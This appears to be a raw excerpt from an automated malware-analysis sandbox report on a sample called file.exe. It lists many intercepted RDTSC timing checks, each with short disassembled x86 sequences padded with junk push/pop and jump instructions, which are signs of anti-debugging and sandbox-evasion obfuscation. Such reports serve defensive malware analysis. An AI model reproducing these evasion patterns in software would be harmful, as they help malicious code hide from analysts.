Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30961 second address: C30967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30967 second address: C30978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F702D6C0E46h 0x00000009 jns 00007F702D6C0E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30ADB second address: C30ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30D22 second address: C30D2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30D2C second address: C30D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30D48 second address: C30D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnl 00007F702D6C0E72h 0x00000013 jmp 00007F702D6C0E4Bh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C311B1 second address: C311B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C311B7 second address: C311BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C311BB second address: C311C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F702C87CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C311C7 second address: C311CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C315D2 second address: C315D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C315D8 second address: C315E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F702D6C0E46h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C315E9 second address: C315ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2FFFC second address: C3003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F702D6C0E54h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F702D6C0E55h 0x00000012 jmp 00007F702D6C0E51h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3003E second address: C30042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35DD4 second address: C35DDA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7C7A second address: BA7C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jmp 00007F702C87CBA9h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38729 second address: C3872F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3872F second address: C3874B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F702C87CBA7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C388AA second address: C388B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F702D6C0E46h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A07 second address: C38A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F702C87CB96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A13 second address: C38A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BCB4 second address: C3BCBE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F702C87CBA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BCBE second address: C3BCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F702D6C0E46h 0x0000000a jno 00007F702D6C0E5Bh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BCEB second address: C3BCF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BCF1 second address: C3BCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F702D6C0E48h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5681 second address: BB5685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5685 second address: BB5697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F702D6C0E46h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5697 second address: BB569B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40311 second address: C40397 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F702D6C0E4Fh 0x00000008 pop edi 0x00000009 pushad 0x0000000a jne 00007F702D6C0E46h 0x00000010 jno 00007F702D6C0E46h 0x00000016 jmp 00007F702D6C0E4Eh 0x0000001b jmp 00007F702D6C0E50h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 jne 00007F702D6C0E5Bh 0x0000002a jmp 00007F702D6C0E56h 0x0000002f jmp 00007F702D6C0E4Bh 0x00000034 je 00007F702D6C0E4Eh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C470FA second address: C47104 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F702C87CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47104 second address: C47110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F702D6C0E46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4680C second address: C46816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46816 second address: C4681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4681C second address: C4682E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CB9Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4682E second address: C4684C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4684C second address: C46850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46850 second address: C4687C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E52h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jo 00007F702D6C0E4Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4687C second address: C46880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46880 second address: C4688A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F702D6C0E46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46DE8 second address: C46DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B5E6 second address: C4B5F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F702D6C0E46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B874 second address: C4B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BA19 second address: C4BA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BA20 second address: C4BA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F702C87CBA2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BA3D second address: C4BA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBAA4 second address: BEBB2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F702C87CB9Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F702C87CB98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push ecx 0x0000002b mov edi, dword ptr [ebp+122D346Ch] 0x00000031 pop edi 0x00000032 mov ebx, dword ptr [ebp+1247EC9Eh] 0x00000038 sub dword ptr [ebp+122D2AA0h], ebx 0x0000003e add eax, ebx 0x00000040 jno 00007F702C87CB9Ch 0x00000046 push eax 0x00000047 push esi 0x00000048 js 00007F702C87CB98h 0x0000004e push esi 0x0000004f pop esi 0x00000050 pop esi 0x00000051 mov dword ptr [esp], eax 0x00000054 movzx edx, dx 0x00000057 push 00000004h 0x00000059 mov cx, C477h 0x0000005d nop 0x0000005e push esi 0x0000005f push eax 0x00000060 pushad 0x00000061 popad 0x00000062 pop eax 0x00000063 pop esi 0x00000064 push eax 0x00000065 jng 00007F702C87CBA4h 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBB2C second address: BEBB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BD15 second address: C4BD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BD1A second address: C4BD1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BD1F second address: C4BD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE78 second address: C4BE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58B5A second address: C58B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F702C87CBA7h 0x0000000d popad 0x0000000e pushad 0x0000000f jng 00007F702C87CB98h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C57D57 second address: C57D64 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F702D6C0E48h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C57EC3 second address: C57ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C582C3 second address: C582CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58463 second address: C58467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58467 second address: C5847D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push esi 0x0000000e je 00007F702D6C0E4Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5888F second address: C58894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58894 second address: C5889A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5889A second address: C5889E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D3CB second address: C5D3D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F702D6C0E46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D3D8 second address: C5D3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F702C87CBA2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D3F3 second address: C5D3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64098 second address: C6409C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6409C second address: C640B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F702D6C0E4Ch 0x00000012 jl 00007F702D6C0E46h 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64263 second address: C64270 instructions: 0x00000000 rdtsc 0x00000002 js 00007F702C87CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64270 second address: C64276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6452E second address: C64534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64534 second address: C6453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6453A second address: C6453F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6453F second address: C64545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64545 second address: C64553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F702C87CB96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64699 second address: C646C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F702D6C0E46h 0x0000000d pop esi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F702D6C0E52h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F702D6C0E46h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646C4 second address: C646CE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F702C87CB96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646CE second address: C646D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64ADF second address: C64AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64AE6 second address: C64B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E51h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F702D6C0E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64DC9 second address: C64DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F702C87CB9Dh 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F702C87CB96h 0x00000018 jmp 00007F702C87CB9Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64DF5 second address: C64DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65EBE second address: C65EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65EC2 second address: C65EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63C93 second address: C63C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63C97 second address: C63C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63C9B second address: C63CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63CA1 second address: C63CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63CBA second address: C63CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C29B second address: C6C2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F702D6C0E4Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C2AC second address: C6C2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7BC80 second address: C7BC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F702D6C0E4Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E363 second address: C7E373 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F702C87CB9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E373 second address: C7E379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E379 second address: C7E37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E37D second address: C7E381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E381 second address: C7E3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F702C87CB9Ah 0x0000000e pushad 0x0000000f jmp 00007F702C87CBA4h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E3AD second address: C7E3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F702D6C0E57h 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8524B second address: C85252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85252 second address: C85273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F702D6C0E57h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85273 second address: C85279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D95A second address: C8D964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F702D6C0E46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D964 second address: C8D968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
